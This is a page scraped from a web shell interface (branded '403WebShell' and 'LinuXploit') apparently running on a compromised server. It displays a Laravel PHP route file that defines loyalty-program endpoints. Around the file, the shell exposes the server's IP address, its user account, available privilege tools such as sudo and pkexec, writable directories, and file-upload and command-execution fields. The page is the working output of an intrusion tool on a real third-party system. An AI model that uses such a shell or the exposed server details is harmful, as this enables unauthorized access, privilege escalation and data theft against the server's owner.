Uname:Linux localhost.localdomain 5.14.0-596.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jun 27 16:02:33 UTC 2025 x86_64

403WebShell
403Webshell
Server IP : 14.225.216.240  /  Your IP : 216.73.217.114
Web Server : nginx/1.20.1
System : Linux localhost.localdomain 5.14.0-596.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jun 27 16:02:33 UTC 2025 x86_64
User : taidh ( 1001)
PHP Version : 8.3.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/pts/app/Module/Admin/Route/Classification/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/pts/app/Module/Admin/Route/Classification/Loyalty.php
<?php
// phpcs:ignore
use Illuminate\Support\Facades\Route;
Route::group(
    ['prefix' => 'loyalties', 'as' => 'loyalty.'],
    function () {
        Route::get('/', 'LoyaltyController@index')->name('index');
        Route::get('/search', 'LoyaltyController@search')->name('search');
        Route::get('forms', 'LoyaltyController@form')->name('add');
        Route::get('{id}/forms', 'LoyaltyController@form')->name('edit');
        Route::get('/{guid}', 'LoyaltyController@detail')->name('detail');
        Route::delete('{guid}', 'LoyaltyController@delete')->name('delete');
        Route::put('{guid}/status', 'LoyaltyController@status')->name('status');
        Route::post('/', 'LoyaltyController@save')->name('save');
        Route::put('/', 'LoyaltyController@save')->name('save');
    }
);

Youez - 2016 - github.com/yon3zu
LinuXploit